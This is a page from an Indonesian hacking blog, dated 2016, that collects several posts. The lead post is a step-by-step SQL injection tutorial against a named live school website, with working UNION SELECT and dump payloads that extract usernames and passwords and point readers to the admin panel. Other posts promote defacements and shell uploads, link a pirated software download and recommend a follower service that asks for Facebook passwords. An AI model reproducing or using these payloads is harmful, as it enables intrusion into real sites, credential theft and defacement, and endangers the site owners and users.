Jumat, 02 September 2016

Tutorial Injeksi CMS Formulasi dengan $_post SQLI

setelah lama ga update blog tutorial sqli kembali hadir dengan tutorial sql injection. kali ini kita akan bahas cara injeksi pada salah satu cms buatan asli indonesia yaitu cms formulasi. cms ini ternyata memilik celah pada salah satu form pencariannya.

bahan yang di perlukan.
  • Komputer (wajib)
  • koneksi internet
  • advance hackbar ( donlod di sini ) kenapa saya menggunakan advace hackbar ini karena di dalamnya sudah include dengan DIOS (dump in one shoot) serta di lengkapi dengan tambahan query untuk membypass waf. jadi lebih mudah dalam melakukan injeksi.
  • ikat kepala warna putih,kopi, cemilan dan rokok sampoerna mint (optional) :D
ok kita mulai.. di sini saya sudah menyiapkan live target yaitu http://smkn1-kedawung.sch.id/smea/kelas-siswa.html . bagi teman teman yang lain silahkan mancari target lain. dork bisa kalian racik sendiri. di sini saya hanya akan memberikan tutorial injeksinya saja.

kita donlod dulu hackbarnya di sini advancehackbar kemudian klik allow trus install. restart browser anda

  1.  kita buka web http://smkn1-kedawung.sch.id/smea/kelas-siswa.html kemudia pada form kelas kita pilih salah satu jenis kelas. perhatikan gambar di bawah
  2. kemudian kita aktifkan hackbar yang udah kita pasang tadi dengan menekan tombol f9. kemudian load url dan post data kita centang.
  3. terlihat parameter kelas=10 pada post data. kita cek dengan menambahkan tanda kutip (') .. yups.. terjadi error. berarti injeksi dapat kita lanjutkan
  4. kita lakukan order by secara berurutan hingga menemukan error. kelas=10' order by 1#  oya untuk balancenya ita gunakan tanda pagar # (kress) bukan +--+
  5. di sini saya menemukan jumlah total kolom 27.lalu kita lanjutkan dengan union select kelas=1.0' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# muncul angka ajibnya yaitu 1,2,6,25.

  6. kita pilih salah satu angka yg muncul. di sini saya pilih angka 6. kita blok angka 6 pada hackbar trus kita klik union based , dios mysql , trus klik dios by madblodd . dannnnn..... terbuka semua table dan kolomnya :D
  7. kita pilih salah satu table yaitu rd3grz_users , kemudian kita masukan nama kolomnya , namausers,sandiusers menjadi kelas=1.0' UNION SELECT 1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(rd3grz_users)where@:=export_set(5,export_set(5,@,namausers,0x3c6c693e,2),sandiusers,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
untuk selanjutnya silahkan crack sendiri passwordnya menggunakan tool online yang banyak tersedia. untuk login adminnya secara default berada di adminpanel .

tutorial ini hanya untuk pembelajaran saja. segala resiko yang timbul akibat dari pemakaian exploit ini di luar tanggung jawab penulis.
Read more

Situs Vendor Game Konami Diretas Hacker

Kali ini peretasan datang dari salahsatu vendor game yang cukup populer. Yup, siapa yang tidak kenal dengan Konami. PES yang cukup digemari banyak orang merupakan game dari Konami. Nah hari ini situs resmi mereka konami.com diretas hacker.

Peretas yang mengatasnamakan dirinya Mr.MaGnoM dari tim Codersleet tersebut menambahkan file deface nya di /gaming/tt.html pada web konami.com.
Tidak ada pesan khusus . Peretas hanya memberi notice "Hacked by Codersleet" ditambah "manifesto" dari tim codersleet sendiri.
! HacKed By Codersleet !
Codersleet an idea and The idea never die
your site is box3d by Codersleet
Resistance takes place in Our veins 
We dont follow rules we make our own rules 
We are here in order to achieve Our dreams
we walk on the road alone , Our goals is clear 
we don't care obstacles , we don't know despair
we don't know failure , Our spirit never die
Sampai berita ini diturunkan belum ada perbaikan dari situs konami.com .
Hackedhttps://konami.com/gaming/tt.html
Oke sekian berita kali ini, selamat pagi selamat beraktifitas.
Read more

Kamis, 01 September 2016

IT ( Information Technology )

Information Technology dalam bahasa indonesia dapat disebut TI (Teknologi Informasi) adalah istilah umum yang menjelaskan atau yang membantu manusia dalam hal membuat, mengubah, menyimpan, mengkomunikasikan atau menyebarkan informasi.

IT adalah menyatukan komputasi dan komunikasi berkecepatan tinggi untuk data, suara, dan video. Bukan hanya komputer lho kawan, namun dapat juga Telepon, Handphone, TV, Radio, peralatan elektronik rumah tangga dan yang baru - baru ini internet.

Sejarah Awal mula IT

Pada awal sejarah, manusia bertukar informasi melalui bahasa. Maka bahasa adalah teknologi, bahasa memungkinkan seseorang memahami informasi yang disampaikan oleh orang lain.

Tetapi bahasa yang disampaikan mempunyai banyak kelemahan ya contoh paling mudah dalam hal kejelasan, kekuatan pasti kan terbatas ruang dan waktu.
Setelah itu teknologi penyampaian informasi berkembang melalui gambar. 

Dengan gambar jangkauan informasi bisa lebih jauh. Gambar ini bisa dibawa-bawa dan disampaikan kepada orang lain. Selain itu informasi yang ada akan bertahan lebih lama apalagi sekarang jamanya internet ,melalui internet gambar bisa didistribusikan kemana saja.

Beberapa gambar peninggalan zaman purba masih ada sampai sekarang sehingga manusia sekarang dapat (mencoba) memahami informasi yang ingin disampaikan pembuatnya. Ditemukannya alfabet dan angka arabik memudahkan cara penyampaian informasi yang lebih efisien dari cara yang sebelumnya. Suatu gambar yang mewakili suatu peristiwa dibuat dengan kombinasi alfabet, atau dengan penulisan angka, seperti MCMXLIII diganti dengan 1943. Teknologi dengan alfabet ini memudahkan dalam penulisan informasi itu.

Kemudian, teknologi percetakan memungkinkan pengiriman informasi lebih cepat lagi. Teknologi elektronik seperti radio, televisi, komputer mengakibatkan informasi menjadi lebih cepat tersebar di area yang lebih luas dan lebih lama tersimpan.































Read more

Download Camtasia Studio 8 Free ( RECORD ) Work ALL WINDOWS


Assalamualaikumm.. yang suka record record game dan lain lain bisa pake software ini langsung aja download yaa...


Download ==> Camtasia Studio 8


Read more

Tutorial Menggunakan Hublaa Followers Facebook



Tutorial Menggunakan Hublaa Followers Facebook

okee assalamualaikum...

bagaimana cara menggunakan hublaa followers facebook ?
langsung saja di simak baik baik :D
buka hublaa di google
masukan email password facebook anda ...
masukan code securitynyaaa
disitu ada pilihannn ane pilih followerss aja ....
masukan lagi email passwordd facebook anda...
followers sebelumnya : 4.452 orang
followers sesudahnya : 4.565 orang
kalo kalian mau menambahkan followersnya kalian tunggu 1 jam ..
terima kasihhhh...

Link = https://hublaa.me/

Video Di Bawah ini 

pesan : Jangan pernah me ngeluh dengan pengembangan/pembaharuan karena pembaharuan punya tujuan Untuk menjadi lebih baik ( admin Hublaa Indonesia )
terima kasih atas kunjungannyaaa...






Read more

Perbedaan Antara The Real Master Dan Fake Master



Perbedaan Antara The Real Master Dan Fake Master 
Kalo menurut saya yang hebat itu engga selalu akan terlihat oleh orang lain, karena mereka sendiri takut identitasnya menyebar kemana-mana, sedangkan yang ngaku nya hebat kok lebih terkenal ya ? di bandingkan orang yang memang hebat, ya mungkin karena kerjaannya mereka hanya show off / Pamer Skill :D saja..

Para Fake Master cenderung senang bila dirinya semakin terkenal, mungkin di pikiran mereka bagaimana pun caranya saya harus terkenal !!. mungkin di belakang itu semua ada para The Real Master yang sedang menonton kelakuan lucu para Fake Master :v 

sedangkan Fake Master ya kerjaannya itu-itu doang hasilnya juga itu lagi itu lagi,, habis beraksi lalu show off ( Pamer ) :v
Mereka yang ngakunya Master (Fake Master) Paling senang show off tujuan dari show off selain menyombongkan diri apa coba ?? biar terkenal ?? ya sama aja sombong kali.. 

ketika mereka sedang show off lalu ada yang menyebutnya master / mastah atau apalah :v mereka malah mengaku newbie ?? loh kok pengen di akui sebagai master tapi malah menyebut dirinya newbie ?? aneh kan ?? kata si Fake Master "Master Ndasmu -_-" kata-kata seperti itu sering dikeluarkan oleh si Fake Master. entah apa tujuannya ? mungkin supaya kaga minta di ajarin kali ? ya bisa jadi.. males ngajarin / sombong

*Kalau ada yang tersinggung saya mohon maaf yaa.. ^_^ 




Read more

Tutorial Upload Shell Deface Menggunakan Tamper Data

Tutorial upload shell deface menggunakan tamper data ini simple kok caranya :)
Langsung aja lihat videonya yaaa...
methode Sql Lokomedia dan yang lainnnya juga bisa kok .. gak ada salahnya untuk mencoba ..




Video Di Bawah ini 



Read more

Rabu, 31 Agustus 2016

Hacker Retas 10 Subdomain Situs Universitas Sriwijaya

Kali ini kabar peretasan datang dari salahsatu situs akademik Indonesia yaitu situs resmi Universitas Sriwijaya. Defacer dengan kodenama M2404 ( Malaikat Maut ) meretas 10 subdomain dari unsri.ac.id .

Tidak ada pesan khusus. Namun defacer juga memberi peringatan agar pemilik website segera melakukan patch terhadap bug yang ada di situs unsri.
Berikut list situs yang diretas :
http://bem.unsri.ac.id/wp-content/
http://pur-plso.unsri.ac.id/x.html
http://www.mipa.unsri.ac.id/2013/x.html
http://www.fkip.unsri.ac.id/wahdian/x.html
http://www.fkm.unsri.ac.id/prestasi/
http://www.fh.unsri.ac.id/userfiles/x.html
http://www.fk.unsri.ac.id/files/x.html
http://www.fisip.unsri.ac.id/userfiles/x.html
http://www.pramuka.unsri.ac.id/userfiles/x.html
http://ibcseminar2014.unsri.ac.id/wp-content/uploads/

Mirror :
http://www.zone-h.org/mirror/id/26745685
http://www.zone-h.org/mirror/id/26745777
http://www.zone-h.org/mirror/id/26745647
http://www.zone-h.org/mirror/id/26745730
http://www.zone-h.org/mirror/id/26745738

Selain itu , defacer juga meninggalkan contact yang bisa dihubungi :
https://web.facebook.com/websiteanalysis/

Sampai saat berita ini dirilis belum ada perbaikan dari situs yang bersangkutan. Oke sekian berita pagi hari ini, dan selamat beraktifitas. (jack/lsc)
Read more